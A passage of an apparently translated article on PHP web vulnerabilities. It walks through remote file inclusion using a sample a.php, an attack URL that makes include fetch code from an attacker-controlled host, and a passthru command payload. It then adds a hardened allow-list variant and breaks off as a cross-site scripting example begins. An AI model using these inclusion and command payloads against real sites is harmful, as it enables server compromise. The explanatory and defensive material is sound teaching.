When it comes to network security today, the web page vulnerabilities people worry about most are probably those in ASP. Xiaozhu is the expert on that subject, so I have nothing to add. PHP, however, also has very serious security problems, yet few articles cover them. Here I will briefly discuss the vulnerabilities related to PHP pages.
I have summarized the currently known PHP vulnerabilities, which fall roughly into the following categories: file inclusion vulnerabilities, script command execution vulnerabilities, file disclosure vulnerabilities, and SQL injection vulnerabilities. General techniques such as cookie spoofing are not discussed here, since there is plenty of material about them online. So, let's analyze how these vulnerabilities are exploited!
First, let's discuss the file inclusion vulnerability. This vulnerability can be said to be a PHP one, because a remote attacker can use it to execute arbitrary commands with the privileges of the web process. Let's take an example: assume that a.php contains the following code:
<?php
include($include . "/xxx.php");
?>
In this code, $include is normally a preset path, but we can construct a path ourselves to carry out an attack. For example, we submit: a.php?include=http://web/b.php, where web is a space we control and b.php is the code we use for the attack. In b.php we can write something like: passthru("/bin/ls /etc"); In this way, some purposeful attacks can be carried out. (Note: the web server should not execute PHP code itself, otherwise there will be problems. For details, see <<How to attack common vulnerabilities in PHP programs>>.) There are many instances of this vulnerability, in all kinds of software: PayPal Store Front, HotNews, Mambo Open Source, PhpDig, YaBB SE, phpBB, Invision Board, Solmetra SPAW Editor, Les Visiteurs, PhpGedView, X-Cart, etc.
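For comparison with the a.php snippet above, here is a hardened variant, added as an example and not part of the original article. It goes slightly beyond the URL case by also rejecting traversal strings and array values; the module names and directories are hypothetical.

```php
<?php
// Added example: hardened variant of the include in a.php.
// Assumption: the application only needs a few known module directories.
// The keys and directory names below are hypothetical.
const ALLOWED_MODULES = [
    'news'  => __DIR__ . '/modules/news',
    'forum' => __DIR__ . '/modules/forum',
];

/**
 * Map a request value to a fixed directory, or return null.
 * The user's string is used only as a lookup key; it never becomes
 * part of the path passed to include.
 */
function resolve_module_dir($requested): ?string
{
    if (!is_string($requested)) {
        return null; // e.g. include[]=x arrives as an array
    }
    return ALLOWED_MODULES[$requested] ?? null;
}

// Constructed inputs: a legitimate key, the URL form from the article,
// a directory traversal string, and an array value.
$samples = ['news', 'http://web/b.php', '../../etc', ['news']];

foreach ($samples as $value) {
    $dir   = resolve_module_dir($value);
    $shown = is_string($value) ? $value : gettype($value);
    if ($dir === null) {
        echo "rejected: $shown\n";
        continue;
    }
    // In a.php this is where the include would happen:
    //     include $dir . '/xxx.php';
    echo "accepted: $shown -> $dir/xxx.php\n";
}

// Defence in depth: a remote URL in include() needs allow_url_fopen and,
// since PHP 5.2, allow_url_include. Report the current values so they can
// be switched off in php.ini when not needed.
foreach (['allow_url_fopen', 'allow_url_include'] as $opt) {
    echo $opt, ' = ', var_export(ini_get($opt), true), "\n";
}
```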
Next, let's look at the script command execution vulnerability. It arises because URI parameters submitted by the user are not sufficiently filtered: submitting data that contains malicious HTML code can trigger a cross-site scripting attack, which may expose the target user's sensitive information. Again, an example: in PHP Transparent on PHP 4.3.1 and earlier versions, the index.php page does not sufficiently filter PHPSESSID, and we can achieve the attack with this code: